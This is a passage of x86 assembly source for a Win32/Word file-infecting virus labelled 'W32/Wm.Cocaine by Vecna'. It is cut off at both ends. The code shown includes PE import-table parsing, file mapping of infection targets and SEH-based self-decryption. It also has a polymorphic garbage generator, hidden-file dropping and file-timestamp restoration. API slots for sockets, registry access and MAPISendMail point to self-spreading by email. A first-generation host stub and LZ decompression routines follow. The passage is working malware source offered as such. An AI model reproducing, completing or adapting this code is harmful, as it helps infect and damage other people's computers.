|
mov ecx, [ebp+12]
|
|||
|
shr ecx, 1
|
|||
|
@@1:
|
|||
|
movzx eax, wo [esi]
|
|||
|
add edx, eax
|
|||
|
mov eax, edx
|
|||
|
and edx, 0FFFFh
|
|||
|
shr eax, 10h
|
|||
|
add edx, eax
|
|||
|
add esi, 2
|
|||
|
loop @@1
|
|||
|
mov eax, edx
|
|||
|
shr eax, 10h
|
|||
|
add ax, dx
|
|||
|
add eax, [ebp+12]
|
|||
|
pop edx
|
|||
|
pop ecx
|
|||
|
pop esi
|
|||
|
leave
|
|||
|
retn 8
|
|||
|
ChecksumMappedFile endp
|
|||
|
|
|||
|
SearchIT proc
|
|||
|
pushad
|
|||
|
call sne
|
|||
|
mov esp,[esp+8] ;fix stack
|
|||
|
_rseh:
|
|||
|
sub eax, eax ;signal not found
|
|||
|
jmp rseh
|
|||
|
sne:
|
|||
|
sub edx, edx
|
|||
|
push dwo fs:[edx]
|
|||
|
mov fs:[edx], esp ;set SEH
|
|||
|
call gpa_kernel32 ;get add for the case it is bound
|
|||
|
mov edi, eax
|
|||
|
mov eax, dwo [esi+128] ;import dir
|
|||
|
push edi
|
|||
|
call virtual2physical
|
|||
|
pop edi
|
|||
|
jc @@3
|
|||
|
mov edx, eax
|
|||
|
add edx, ebx
|
|||
|
@@2:
|
|||
|
cmp dwo [edx], 0
|
|||
|
je @@3
|
|||
|
mov eax, [edx+12] ;get module name
|
|||
|
push edi
|
|||
|
call virtual2physical
|
|||
|
pop edi
|
|||
|
jc @@0
|
|||
|
add eax, ebx
|
|||
|
mov ecx, 12345678h
|
|||
|
dll_name equ dwo $-4
|
|||
|
call strcmp
|
|||
|
jz @@1
|
|||
|
@@0:
|
|||
|
add edx, 20 ;check next
|
|||
|
jmp @@2 ;process next dir
|
|||
|
@@3:
|
|||
|
jmp _rseh
|
|||
|
@@1:
|
|||
|
mov eax, [edx+16] ;pointer to name table pointer
|
|||
|
mov ebp, eax
|
|||
|
push edi
|
|||
|
call virtual2physical
|
|||
|
pop edi
|
|||
|
jc @@3
|
|||
|
add eax, ebx
|
|||
|
mov edx, esi
|
|||
|
mov esi, eax
|
|||
|
sub ecx, ecx
|
|||
|
@@4:
|
|||
|
lodsd ;load pointer to name
|
|||
|
test eax, eax
|
|||
|
jz @@3 ;ebx=base
|
|||
|
inc ecx
|
|||
|
cmp eax, edi
|
|||
|
jz @@6
|
|||
|
cmp eax, 077f00000h
|
|||
|
ja @@4 ;pointing to kernel? is bound
|
|||
|
xchg esi, edx
|
|||
|
push edi
|
|||
|
call virtual2physical ;edx=table esi=pe header
|
|||
|
pop edi
|
|||
|
jc @@3
|
|||
|
push edi
|
|||
|
mov edi, [esp+(7*4)+4+8] ;load requested API
|
|||
|
push esi
|
|||
|
lea esi, [eax+ebx+2]
|
|||
|
dec edi
|
|||
|
@@7:
|
|||
|
inc edi
|
|||
|
lodsb
|
|||
|
test al, al
|
|||
|
jz @@5
|
|||
|
cmp [edi], al
|
|||
|
je @@7
|
|||
|
pop esi
|
|||
|
pop edi
|
|||
|
xchg esi, edx ;esi=table edx=pe header
|
|||
|
jmp @@4
|
|||
|
@@5:
|
|||
|
pop eax
|
|||
|
pop eax
|
|||
|
@@6:
|
|||
|
dec ecx
|
|||
|
lea eax, [ebp+(ecx*4)]
|
|||
|
rseh:
|
|||
|
sub edx, edx
|
|||
|
pop dwo fs:[edx] ;remove frame
|
|||
|
pop edx
|
|||
|
mov dwo [esp+(7*4)], eax
|
|||
|
popad
|
|||
|
ret
|
|||
|
SearchIT endp
|
|||
|
|
|||
|
strcmp proc
|
|||
|
push edx ebx edi
|
|||
|
@@2:
|
|||
|
mov bl, [eax]
|
|||
|
cmp bl, 'a'
|
|||
|
jb @@3
|
|||
|
cmp bl, 'z'
|
|||
|
ja @@3
|
|||
|
and bl, not 20h
|
|||
|
@@3:
|
|||
|
cmp by [ecx], 0
|
|||
|
jz @@1
|
|||
|
cmp [ecx], bl
|
|||
|
jnz @@1
|
|||
|
inc ecx
|
|||
|
inc eax
|
|||
|
jmp @@2
|
|||
|
@@1:
|
|||
|
pop edi ebx edx
|
|||
|
ret
|
|||
|
strcmp endp
|
|||
|
|
|||
|
virtual2physical proc
|
|||
|
push ecx esi
|
|||
|
mov edi, esi
|
|||
|
movzx ecx, wo [esi+20]
|
|||
|
add edi, 24
|
|||
|
add edi, ecx ;edi eq 1th section header
|
|||
|
movzx ecx, wo [esi+peh_nosections]
|
|||
|
@@0:
|
|||
|
push eax
|
|||
|
sub eax, [edi+12] ;sub RVA
|
|||
|
cmp eax, [edi+8] ;pointing inside?
|
|||
|
jb @@1
|
|||
|
pop eax
|
|||
|
add edi, 40 ;next section header
|
|||
|
loop @@0
|
|||
|
sub eax, eax
|
|||
|
stc ;signal error
|
|||
|
jmp @@2
|
|||
|
@@1:
|
|||
|
add eax, [edi+20] ;add raw pointer
|
|||
|
pop ecx ;fix stack
|
|||
|
@@2:
|
|||
|
pop esi ecx ;eax=fisical place
|
|||
|
ret ;edi=section
|
|||
|
virtual2physical endp
|
|||
|
|
|||
|
virtual2physical_ proc
|
|||
|
pushad
|
|||
|
mov esi, [ebp+(ofs pe_header-ofs vcode)]
|
|||
|
call virtual2physical
|
|||
|
mov [esp+(7*4)], eax
|
|||
|
popad
|
|||
|
ret
|
|||
|
virtual2physical_ endp
|
|||
|
|
|||
|
physical2virtual_ proc
|
|||
|
pushad
|
|||
|
mov esi, [ebp+(ofs pe_header-ofs vcode)]
|
|||
|
call physical2virtual
|
|||
|
mov [esp+(7*4)], eax
|
|||
|
popad
|
|||
|
ret
|
|||
|
physical2virtual_ endp
|
|||
|
|
|||
|
physical2virtual proc
|
|||
|
push ecx esi
|
|||
|
mov esi, [ebp+(ofs pe_header-ofs vcode)]
|
|||
|
mov edi, esi
|
|||
|
movzx ecx, wo [esi+20]
|
|||
|
add edi, 24
|
|||
|
add edi, ecx ;edi eq 1th section header
|
|||
|
movzx ecx, wo [esi+peh_nosections]
|
|||
|
@@0:
|
|||
|
push eax
|
|||
|
sub eax, [edi+20] ;sub physical start
|
|||
|
cmp eax, [edi+16] ;still pointing to this section
|
|||
|
jb @@1
|
|||
|
pop eax
|
|||
|
add edi, 40 ;next section header
|
|||
|
loop @@0
|
|||
|
sub eax, eax
|
|||
|
stc ;signal error
|
|||
|
jmp @@2
|
|||
|
@@1:
|
|||
|
add eax, [edi+12] ;add rva
|
|||
|
pop ecx
|
|||
|
@@2:
|
|||
|
pop esi ecx ;eax=fisical place
|
|||
|
ret ;edi=section
|
|||
|
physical2virtual endp
|
|||
|
|
|||
|
MapFile proc
|
|||
|
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jz @@1 ;if [mm_on_off] contains a @
|
|||
|
clc ;treat it like a memory mapped
|
|||
|
ret ;file
|
|||
|
@@1:
|
|||
|
push -1
|
|||
|
mf_mode1 equ by $-1
|
|||
|
|
|||
|
pop ecx
|
|||
|
jecxz @@212
|
|||
|
|
|||
|
push 80h
|
|||
|
lea eax, [ebp+(ofs directory-ofs vcode)]
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jz error_map ;blank attributes
|
|||
|
|
|||
|
@@212:
|
|||
|
sub eax, eax
|
|||
|
push eax
|
|||
|
push 80h
|
|||
|
push 3
|
|||
|
mf_mode equ by $-1
|
|||
|
push eax eax
|
|||
|
push 0c0000000h ;read/write
|
|||
|
lea eax, [ebp+(ofs directory-ofs vcode)]
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _CreateFileA-ofs vcode)]
|
|||
|
inc eax
|
|||
|
jz error_mapf
|
|||
|
dec eax
|
|||
|
mov [ebp+(ofs handle1-ofs vcode)], eax
|
|||
|
|
|||
|
sub ebx, ebx
|
|||
|
|
|||
|
cmp [ebp+(ofs fsizel-ofs vcode)], ebx
|
|||
|
jne @@2
|
|||
|
|
|||
|
push ebx
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _GetFileSize-ofs vcode)]
|
|||
|
mov [ebp+(ofs fsizel-ofs vcode)], eax
|
|||
|
sub edx, edx
|
|||
|
mov ecx, DIV_VALUE
|
|||
|
div ecx
|
|||
|
test edx, edx
|
|||
|
jz close_map
|
|||
|
|
|||
|
@@2:
|
|||
|
|
|||
|
sub eax, eax
|
|||
|
push eax
|
|||
|
push dwo [ebp+(ofs fsizel-ofs vcode)]
|
|||
|
push eax
|
|||
|
push 4
|
|||
|
push eax
|
|||
|
push dwo [ebp+(ofs handle1-ofs vcode)]
|
|||
|
call [ebp+(ofs _CreateFileMappingA-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jz close_map
|
|||
|
mov [ebp+(ofs handle2-ofs vcode)], eax
|
|||
|
sub eax, eax
|
|||
|
push dwo [ebp+(ofs fsizel-ofs vcode)]
|
|||
|
push eax eax
|
|||
|
push 2
|
|||
|
push dwo [ebp+(ofs handle2-ofs vcode)]
|
|||
|
call [ebp+(ofs _MapViewOfFile-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jz unmap_map
|
|||
|
ret
|
|||
|
MapFile endp
|
|||
|
|
|||
|
CheckName proc
|
|||
|
push ebp
|
|||
|
call _seh
|
|||
|
mov esp,[esp+8] ;fix stack
|
|||
|
jmp remove_seh
|
|||
|
_seh:
|
|||
|
sub ecx, ecx
|
|||
|
push dwo fs:[ecx]
|
|||
|
mov fs:[ecx], esp
|
|||
|
cld
|
|||
|
call delta
|
|||
|
lea edi, [ebp+(ofs directory-ofs vcode)]
|
|||
|
push edi
|
|||
|
mov esi, [esp+(7*4)+(4*6)+(2*4)] ;get pointer to path name
|
|||
|
@@1:
|
|||
|
lodsb
|
|||
|
cmp al, '\'
|
|||
|
jne @@5
|
|||
|
inc ecx ;signal slash found
|
|||
|
@@5:
|
|||
|
cmp al, '"'
|
|||
|
je @@1
|
|||
|
cmp al, "'" ;ignore these
|
|||
|
je @@1
|
|||
|
cmp al, 'a'
|
|||
|
jb @@3
|
|||
|
cmp al, 'z'
|
|||
|
ja @@3
|
|||
|
and al, not 20h ;make upcase
|
|||
|
@@3:
|
|||
|
stosb
|
|||
|
test al, al
|
|||
|
jnz @@1
|
|||
|
dec edi
|
|||
|
jecxz @@7
|
|||
|
@@2:
|
|||
|
mov al, by [edi-1]
|
|||
|
cmp al, 20h
|
|||
|
je @@8
|
|||
|
add bl, al ;calc chksum
|
|||
|
@@8:
|
|||
|
dec edi
|
|||
|
cmp al, '\' ;find backslash
|
|||
|
jnz @@2
|
|||
|
@@7:
|
|||
|
mov eax, edi
|
|||
|
pop edx
|
|||
|
jecxz @@6
|
|||
|
sub eax, edx
|
|||
|
push ebx
|
|||
|
call ProcessDir ;process directory
|
|||
|
pop ebx
|
|||
|
@@6:
|
|||
|
sub edx, edx
|
|||
|
pop dwo fs:[edx] ;remove frame
|
|||
|
pop edx
|
|||
|
pop ebp
|
|||
|
ret
|
|||
|
CheckName endp
|
|||
|
|
|||
|
UnmapFile proc
|
|||
|
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jz @@1
|
|||
|
clc
|
|||
|
ret
|
|||
|
@@1:
|
|||
|
push dwo [ebp+(ofs map@-ofs vcode)]
|
|||
|
call [ebp+(ofs _UnmapViewOfFile-ofs vcode)]
|
|||
|
unmap_map:
|
|||
|
push dwo [ebp+(ofs handle2-ofs vcode)]
|
|||
|
call [ebp+(ofs _CloseHandle-ofs vcode)]
|
|||
|
close_map:
|
|||
|
lea eax, dwo [ebp+(ofs lw_creat_h-ofs vcode)]
|
|||
|
push eax
|
|||
|
sub eax, 8
|
|||
|
push eax
|
|||
|
sub eax, 8
|
|||
|
push eax
|
|||
|
push dwo [ebp+(ofs handle1-ofs vcode)]
|
|||
|
call [ebp+(ofs _SetFileTime-ofs vcode)]
|
|||
|
push dwo [ebp+(ofs handle1-ofs vcode)]
|
|||
|
call [ebp+(ofs _CloseHandle-ofs vcode)]
|
|||
|
error_mapf:
|
|||
|
push dwo [ebp+(ofs fattr-ofs vcode)]
|
|||
|
lea eax, [ebp+(ofs directory-ofs vcode)]
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
|
|||
|
error_map:
|
|||
|
sub eax, eax
|
|||
|
ret
|
|||
|
UnmapFile endp
|
|||
|
|
|||
|
random0 proc
|
|||
|
sub eax, eax
|
|||
|
random proc
|
|||
|
push ecx edx
|
|||
|
push eax
|
|||
|
call delta
|
|||
|
mov eax, [ebp+(ofs pseed-ofs vcode)]
|
|||
|
mov ecx, 41c64e6dh
|
|||
|
mul ecx
|
|||
|
add eax, 3039h
|
|||
|
and eax, 7ffffffh
|
|||
|
mov [ebp+(ofs pseed-ofs vcode)], eax
|
|||
|
pop ecx
|
|||
|
jecxz @@3 ;limit set?
|
|||
|
sub edx, edx
|
|||
|
div ecx
|
|||
|
xchg eax, edx ;value = rnd MOD limit
|
|||
|
@@3:
|
|||
|
mov ecx, [esp+(2*4)] ;ecx=ret address
|
|||
|
cmp by [ecx], 0cch ;is ret address a int3?
|
|||
|
jne @@4
|
|||
|
jmp ebp ;if so, start to exec garbage
|
|||
|
@@4:
|
|||
|
pop edx ecx
|
|||
|
sahf ;random flagz
|
|||
|
ret
|
|||
|
random endp
|
|||
|
random0 endp
|
|||
|
|
|||
|
;name +4
|
|||
|
;size +8
|
|||
|
;buffer +12
|
|||
|
WriteDump proc
|
|||
|
sub eax, eax
|
|||
|
push eax
|
|||
|
push 12345678h ;hidden file
|
|||
|
wd_att equ dwo $-4
|
|||
|
push 2
|
|||
|
push eax eax
|
|||
|
push 0c0000000h ;read/write
|
|||
|
push dwo [esp+4+(6*4)]
|
|||
|
call [ebp+(ofs _CreateFileA-ofs vcode)]
|
|||
|
mov ebx, eax
|
|||
|
|
|||
|
push 0
|
|||
|
call @@61
|
|||
|
dd 0
|
|||
|
@@61:
|
|||
|
push dwo [esp+8+(2*4)]
|
|||
|
push dwo [esp+12+(3*4)]
|
|||
|
push ebx
|
|||
|
call [ebp+(ofs _WriteFile-ofs vcode)]
|
|||
|
push ebx
|
|||
|
call [ebp+(ofs _CloseHandle-ofs vcode)]
|
|||
|
ret 12
|
|||
|
WriteDump endp
|
|||
|
|
|||
|
FileMask db '\*.*', 0, 0, 0, 0
|
|||
|
|
|||
|
macro_crypt proc
|
|||
|
pushad
|
|||
|
mov al, 0
|
|||
|
macro_key equ by $-1
|
|||
|
mov ecx, ofs macro_end-ofs macro_start
|
|||
|
lea edi, [ebp+(ofs macro_start-ofs vcode)]
|
|||
|
@@1:
|
|||
|
xor by [edi], al
|
|||
|
inc edi
|
|||
|
loop @@1
|
|||
|
popad
|
|||
|
ret
|
|||
|
macro_crypt endp
|
|||
|
|
|||
|
CRC32 proc
|
|||
|
cld
|
|||
|
push ebx
|
|||
|
mov ecx, -1
|
|||
|
mov edx, ecx
|
|||
|
NextByteCRC:
|
|||
|
xor eax, eax
|
|||
|
xor ebx, ebx
|
|||
|
lodsb
|
|||
|
xor al, cl
|
|||
|
mov cl, ch
|
|||
|
mov ch, dl
|
|||
|
mov dl, dh
|
|||
|
mov dh, 8
|
|||
|
NextBitCRC:
|
|||
|
shr bx, 1
|
|||
|
rcr ax, 1
|
|||
|
jnc NoCRC
|
|||
|
xor ax, 08320h
|
|||
|
xor bx, 0edb8h
|
|||
|
NoCRC:
|
|||
|
dec dh
|
|||
|
jnz NextBitCRC
|
|||
|
xor ecx, eax
|
|||
|
xor edx, ebx
|
|||
|
dec di
|
|||
|
jnz NextByteCRC
|
|||
|
not edx
|
|||
|
not ecx
|
|||
|
pop ebx
|
|||
|
mov eax, edx
|
|||
|
rol eax, 16
|
|||
|
mov ax, cx
|
|||
|
ret
|
|||
|
CRC32 endp
|
|||
|
|
|||
|
OpenAncev proc
|
|||
|
sub eax, eax
|
|||
|
push eax
|
|||
|
push 80h
|
|||
|
push 3
|
|||
|
push eax eax
|
|||
|
push 80000000h
|
|||
|
call @@1
|
|||
|
ancevsys db 'C:\ANCEV.SYS', 0
|
|||
|
@@1:
|
|||
|
call [ebp+(ofs _CreateFileA-ofs vcode)]
|
|||
|
inc eax
|
|||
|
jz @@filedontexists
|
|||
|
dec eax
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _CloseHandle-ofs vcode)]
|
|||
|
@@fileexists:
|
|||
|
clc
|
|||
|
ret
|
|||
|
@@filedontexists:
|
|||
|
stc
|
|||
|
ret
|
|||
|
OpenAncev endp
|
|||
|
|
|||
|
align 4
|
|||
|
|
|||
|
dec_end_code equ this byte
|
|||
|
|
|||
|
DecriptInit proc
|
|||
|
cld
|
|||
|
sub eax, eax
|
|||
|
db 0b8h+5 ;mov ebp, delta
|
|||
|
_delta dd 00403000h
|
|||
|
lea ebx, [ebp+(ofs vinit-ofs vcode)]
|
|||
|
push ebx
|
|||
|
lea ebx, [ebp+(ofs dec_end_code-ofs vcode)]
|
|||
|
push dwo fs:[eax]
|
|||
|
mov fs:[eax], esp ;set new seh frame
|
|||
|
mov edi, ebp
|
|||
|
mov eax, 0
|
|||
|
key1 equ dwo $-4
|
|||
|
@@1:
|
|||
|
xor [edi], eax
|
|||
|
scasd
|
|||
|
add eax, 12345678h
|
|||
|
org $-4
|
|||
|
key2 dd 0
|
|||
|
cmp edi, ebx
|
|||
|
jne @@1
|
|||
|
mov eax, cs:[0] ;cause fault
|
|||
|
DecriptInit endp
|
|||
|
|
|||
|
ENDIF
|
|||
|
|
|||
|
vend equ this byte ;END OF PHYSICAL BODY
|
|||
|
|
|||
|
db 'EOV', 0
|
|||
|
|
|||
|
align 4
|
|||
|
|
|||
|
k32_address equ this byte
|
|||
|
_CreateProcessA dd 0
|
|||
|
_CreateFileA dd 0
|
|||
|
_WinExec dd 0
|
|||
|
_CloseHandle dd 0 ;add here a var that hold the
|
|||
|
_LoadLibraryA dd 0
|
|||
|
_FreeLibrary dd 0
|
|||
|
_CreateFileMappingA dd 0
|
|||
|
_MapViewOfFile dd 0
|
|||
|
_UnmapViewOfFile dd 0
|
|||
|
_FindFirstFileA dd 0
|
|||
|
_FindNextFileA dd 0
|
|||
|
_FindClose dd 0
|
|||
|
_SetEndOfFile dd 0
|
|||
|
_VirtualAlloc dd 0
|
|||
|
_VirtualFree dd 0
|
|||
|
_GetSystemTime dd 0
|
|||
|
_GetWindowsDirectoryA dd 0
|
|||
|
_GetSystemDirectoryA dd 0
|
|||
|
_GetCurrentDirectoryA dd 0
|
|||
|
_SetFileAttributesA dd 0
|
|||
|
_SetFileTime dd 0
|
|||
|
_ExitProcess dd 0
|
|||
|
_GetCurrentProcess dd 0
|
|||
|
_WriteProcessMemory dd 0
|
|||
|
_WriteFile dd 0
|
|||
|
_DeleteFileA dd 0
|
|||
|
_Sleep dd 0
|
|||
|
_CreateThread dd 0
|
|||
|
_GetFileSize dd 0
|
|||
|
_SetFilePointer dd 0
|
|||
|
|
|||
|
_MessageBoxA dd 0
|
|||
|
_FindWindowA dd 0
|
|||
|
_PostMessageA dd 0
|
|||
|
|
|||
|
_RegCloseKey dd 0
|
|||
|
_RegQueryValueEx dd 0
|
|||
|
_RegOpenKeyEx dd 0
|
|||
|
_RegCreateKeyEx dd 0
|
|||
|
_RegSetValueEx dd 0
|
|||
|
|
|||
|
_GetModuleHandle dd 0
|
|||
|
_GetProcAddress dd 0 ;basic api init
|
|||
|
|
|||
|
_connect dd 0
|
|||
|
_recv dd 0
|
|||
|
|
|||
|
_MAPISendMail dd 0
|
|||
|
|
|||
|
old_eip dd 0 ;first entrypoint place
|
|||
|
|
|||
|
patch_jump dd 0 ;where last jump is(patch!!)
|
|||
|
|
|||
|
sRVA dd 0 ;CODE section paramz, for
|
|||
|
RawSize dd 0 ;branch_entry
|
|||
|
|
|||
|
lgarble db 0 ;last garble indicator
|
|||
|
inf? db 0 ;can infect file?
|
|||
|
|
|||
|
_dec dw 0 ;instruction used to decript
|
|||
|
|
|||
|
K32 dd 0 ;kernel32 base
|
|||
|
U32 dd 0 ;user32 base
|
|||
|
|
|||
|
pseed dd 0 ;poly seed
|
|||
|
|
|||
|
variables dd 0
|
|||
|
|
|||
|
reg32 dd 0 ;table of reg used
|
|||
|
buffer dd 0 ;current work buffer
|
|||
|
_size dd 0 ;size to encript
|
|||
|
entry dd 0 ;delta to entrypoint
|
|||
|
rva dd 0 ;place in meory where virus
|
|||
|
;will run
|
|||
|
flagz dd 0 ;garbling flagz
|
|||
|
c_reg dd 0 ;actual counter reg
|
|||
|
p_reg dd 0 ;actual pointer reg
|
|||
|
recurse dd 0 ;recursion deep
|
|||
|
decriptor dd 0 ;start of decriptor in current
|
|||
|
;buffer
|
|||
|
|
|||
|
search_handle dd 0
|
|||
|
|
|||
|
_socket dd 0
|
|||
|
socket dd MAX_SOCK dup (0)
|
|||
|
recv_size dd 0
|
|||
|
recv_buff dd 0
|
|||
|
email_w dd 0
|
|||
|
thread dd 0
|
|||
|
email db 128 dup (0)
|
|||
|
|
|||
|
email_crc dd 0
|
|||
|
|
|||
|
secz db 0
|
|||
|
|
|||
|
mdeep db 0
|
|||
|
|
|||
|
align 4
|
|||
|
|
|||
|
handle1 dd 0
|
|||
|
handle2 dd 0
|
|||
|
map@ dd 0 ;map address
|
|||
|
|
|||
|
tamanho dd 0 ;total added size
|
|||
|
ep dd 0 ;new entrypoint
|
|||
|
|
|||
|
image_infect dd 0
|
|||
|
|
|||
|
OurTimer dd 0
|
|||
|
polybuffer dd 0 ;address of buffer for poly
|
|||
|
|
|||
|
buffer1 dd 0 ;temporary poly bufferz
|
|||
|
buffer2 dd 0
|
|||
|
|
|||
|
mm_on_off dd 0
|
|||
|
|
|||
|
pe_header dd 0
|
|||
|
|
|||
|
seed dd 0 ;main random seed
|
|||
|
|
|||
|
_mapi dd 0
|
|||
|
|
|||
|
subject dd 0
|
|||
|
|
|||
|
directory db MAX_PATH dup (0) ;work directory structure
|
|||
|
|
|||
|
lparm dd 0
|
|||
|
lvars dd 0
|
|||
|
subs_index dd 0
|
|||
|
|
|||
|
s_into db 0
|
|||
|
_pusha db 0
|
|||
|
|
|||
|
fname db 32 dup (0)
|
|||
|
|
|||
|
align 4
|
|||
|
|
|||
|
current_time equ this byte
|
|||
|
_year dw 0
|
|||
|
_month dw 0
|
|||
|
_dayofweek dw 0
|
|||
|
_day dw 0
|
|||
|
_hour dw 0
|
|||
|
_minute dw 0
|
|||
|
_second dw 0
|
|||
|
_milisecond dw 0
|
|||
|
|
|||
|
find_data equ this byte
|
|||
|
fattr dd 0
|
|||
|
c_creat_h dd 0
|
|||
|
c_creat_l dd 0
|
|||
|
la_creat_h dd 0
|
|||
|
la_creat_l dd 0
|
|||
|
lw_creat_h dd 0
|
|||
|
lw_creat_l dd 0
|
|||
|
fsizeh dd 0
|
|||
|
fsizel dd 0
|
|||
|
reserved dd 0, 0
|
|||
|
filename db 260 dup (0)
|
|||
|
altname db 13 dup (0)
|
|||
|
altext db 3 dup (0)
|
|||
|
|
|||
|
subs_table db 6*MAX_SUBROUTINES dup (0) ;dd where sub reside
|
|||
|
;db no. of param that sub clean
|
|||
|
;db no. of vars that sub alloc
|
|||
|
|
|||
|
MapiMessage struc
|
|||
|
resd dd ?
|
|||
|
lpszSubject dd ?
|
|||
|
lpszNoteText dd ?
|
|||
|
lpszMessageType dd ?
|
|||
|
lpszDateReceived dd ?
|
|||
|
lpszConversationID dd ?
|
|||
|
flags dd ?
|
|||
|
lpOriginator dd ?
|
|||
|
nRecipCount dd ?
|
|||
|
lpRecips dd ?
|
|||
|
nFileCount dd ?
|
|||
|
lpFiles dd ?
|
|||
|
MapiMessage ends
|
|||
|
|
|||
|
MapiRecipDesc struc
|
|||
|
resd dd ?
|
|||
|
ulRecipClass dd ?
|
|||
|
lpszName dd ?
|
|||
|
lpszAddress dd ?
|
|||
|
ulEIDSize dd ?
|
|||
|
lpEntryID dd ?
|
|||
|
MapiRecipDesc ends
|
|||
|
|
|||
|
MapiFileDesc struc
|
|||
|
resd dd ?
|
|||
|
flFlags dd ?
|
|||
|
nPosition dd ?
|
|||
|
lpszPathName dd ?
|
|||
|
lpszFileName dd ?
|
|||
|
lpFileType dd ?
|
|||
|
MapiFileDesc ends
|
|||
|
|
|||
|
MF MapiFileDesc <0>
|
|||
|
|
|||
|
mend equ this byte
|
|||
|
|
|||
|
_VSEG ends
|
|||
|
|
|||
|
end main
|
|||
|
|
|||
|
;----------------------------------(HOST.INC)---------------------------------
|
|||
|
;Generic Host
|
|||
|
;(c) Vecna 1999
|
|||
|
|
|||
|
;First generation host. Just pass control to virus and, when get control again
|
|||
|
;show a dialog box and exit.
|
|||
|
|
|||
|
_TEXT segment dword use32 public'CODE'
|
|||
|
|
|||
|
extrn ShellAboutA:Proc
|
|||
|
extrn ExitProcess:pRoc
|
|||
|
|
|||
|
;I_AM_IDIOT_USER_THAT_CANT_COMPILE EQU TRUE ;antilamer code :P
|
|||
|
|
|||
|
main proc
|
|||
|
IFNDEF I_AM_IDIOT_USER_THAT_CANT_COMPILE
|
|||
|
jmp DecriptInit
|
|||
|
ENDIF
|
|||
|
host:
|
|||
|
push 0
|
|||
|
push ofs tit
|
|||
|
push ofs msg
|
|||
|
push 0
|
|||
|
call ShellAboutA
|
|||
|
push 0
|
|||
|
call ExitProcess
|
|||
|
main endp
|
|||
|
|
|||
|
_TEXT ends
|
|||
|
|
|||
|
_DATA segment dword use32 public 'DATA'
|
|||
|
|
|||
|
tit db 'W32/Wm.Cocaine by Vecna', 0
|
|||
|
msg db 'Cocaine - A Win32/WinWord Virus#'
|
|||
|
db 'Cocaine - Your PC is now addicted', 0
|
|||
|
|
|||
|
_DATA ends
|
|||
|
|
|||
|
;----------------------------------(HOST.INC)---------------------------------
|
|||
|
;-----------------------------------(LZ.INC)----------------------------------
|
|||
|
;LZ Decompression routines
|
|||
|
;(c) Vecna 1999
|
|||
|
;Converted from a C source
|
|||
|
|
|||
|
;These routines decompress a LZ packed buffer. They where coded in C, and
|
|||
|
;converted to ASM using BCC32 with the -S switch. Beside the normal switchs
|
|||
|
;to optimize, this was optimized by hand a bit. Virogen have in his www page
|
|||
|
;a more optimized version of this routine, and other related material about
|
|||
|
;compression in win32asm.
|
|||
|
|
|||
|
;void fast_copy(p_src,p_dst,len)
|
|||
|
;
|
|||
|
fast_copy proc
|
|||
|
push edi esi ecx
|
|||
|
mov ecx,dword ptr [esp+ 4+(4*3)]
|
|||
|
mov edi,dword ptr [esp+ 8+(4*3)]
|
|||
|
mov esi,dword ptr [esp+12+(4*3)]
|
|||
|
cld
|
|||
|
rep movsb
|
|||
|
pop ecx esi edi
|
|||
|
ret 12
|
|||
|
fast_copy endp
|
|||
|
|
|||
|
|
|||
|
lzrw1_decompress proc near
|
|||
|
?live1@768:
|
|||
|
;
|
|||
|
; void lzrw1_decompress(p_src_first,src_len,p_dst_first,p_dst_len)
|
|||
|
;
|
|||
|
@27:
|
|||
|
push ebp
|
|||
|
mov ebp,esp
|
|||
|
add esp,-8
|
|||
|
push ebx
|
|||
|
push esi
|
|||
|
push edi
|
|||
|
;
|
|||
|
; /* Input : Specify input block using p_src_first and src_len. */
|
|||
|
; /* Input : Point p_dst_first to the start of the output zone. */
|
|||
|
; /* Input : Point p_dst_len to a ULONG to receive the output length. */
|
|||
|
; /* Input : Input block and output zone must not overlap. User knows */
|
|||
|
; /* Input : upperbound on output block length from earlier compression. */
|
|||
|
; /* Input : In any case, maximum expansion possible is eight times. */
|
|||
|
; /* Output : Length of output block written to *p_dst_len. */
|
|||
|
; /* Output : Output block in Mem[p_dst_first..p_dst_first+*p_dst_len-1]. */
|
|||
|
; /* Output : Writes only in Mem[p_dst_first..p_dst_first+*p_dst_len-1]. */
|
|||
|
; UBYTE *p_src_first, *p_dst_first; ULONG src_len, *p_dst_len;
|
|||
|
; {UWORD controlbits=0, control;
|
|||
|
;
|
|||
|
?live1@784: ; EDI = control, ECX = p_src_first
|
|||
|
xor esi,esi
|
|||
|
?live1@800: ;
|
|||
|
mov ecx,dword ptr [ebp+20]
|
|||
|
;
|
|||
|
; UBYTE *p_src=p_src_first+FLAG_BYTES, *p_dst=p_dst_first,
|
|||
|
; *p_src_post=p_src_first+src_len;
|
|||
|
;
|
|||
|
?live1@816: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first
|
|||
|
;
|
|||
|
mov ebx,dword ptr [ebp+16]
|
|||
|
add ebx,ecx
|
|||
|
?live1@832: ; EDI = control, ESI = controlbits, ECX = p_src_first
|
|||
|
mov edx,dword ptr [ebp+12]
|
|||
|
?live1@848: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first
|
|||
|
;
|
|||
|
mov dword ptr [ebp-4],ebx
|
|||
|
?live1@864: ; EDI = control, ESI = controlbits, ECX = p_src_first
|
|||
|
lea eax,dword ptr [ecx+4]
|
|||
|
;
|
|||
|
; if (*p_src_first==FLAG_COPY)
|
|||
|
;
|
|||
|
?live1@880: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first
|
|||
|
;
|
|||
|
cmp byte ptr [ecx],1
|
|||
|
jne short @28
|
|||
|
;
|
|||
|
; {fast_copy(p_src_first+FLAG_BYTES,p_dst_first,src_len-FLAG_BYTES);
|
|||
|
;
|
|||
|
?live1@896: ; ECX = p_src_first
|
|||
|
add ecx,4
|
|||
|
push ecx
|
|||
|
mov eax,dword ptr [ebp+12]
|
|||
|
push eax
|
|||
|
mov edi,dword ptr [ebp+16]
|
|||
|
sub edi,4
|
|||
|
push edi
|
|||
|
call fast_copy
|
|||
|
;
|
|||
|
